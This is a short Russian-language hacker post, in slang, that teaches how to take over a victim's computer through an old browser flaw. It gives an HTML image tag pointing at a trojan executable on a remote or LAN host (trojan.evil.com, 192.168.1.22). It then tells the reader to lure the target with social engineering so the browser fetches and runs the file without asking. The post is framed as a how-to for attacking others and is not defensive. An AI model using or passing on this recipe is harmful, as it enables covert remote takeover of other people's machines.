Привет Перцы!
Расскажу сегодня вам, как поиметь
клиентскую машину через Инет или
через локальную сеть. Будем юзать dev баг,
которому подвержено большое количество
браузеров (и любимый вами IE и нелюбимый Netscape
:). Итак, что нам нужно? Прежде всего халявный
сервак с возможностью размещения
исполняемых файлов.
Далее клепаем пагу со следующим тэгом:
<img src=file://\\trojan.evil.com\HACKME.EXE> КЛЕВЫЙ
ПИКЧЕР
или
<img src=file://\\192.168.1.22\HACKME.EXE> КЛЕВЫЙ ПИКЧЕР
Затем шлем пагу юзверю или засылаем его
туда самыми заманчивыми предложениями (тут
уже изучай про чела все, что только можно -
интересы, работу и т.д., социальная
инженерия понимаешь...). После открытия паги
юзер затянет трояна (при этом умный броузер
будет думать, что это локальный файл и даже
не спросит, сохранять его или открывать, а
сразу откроет) и ты можешь порулить его
машинкой со всеми вытекающими отсюда
последствиями.
THANKS FOR TESTING :
1. Thomas Rowe
2. Arron Spangler
3. Chad Loder
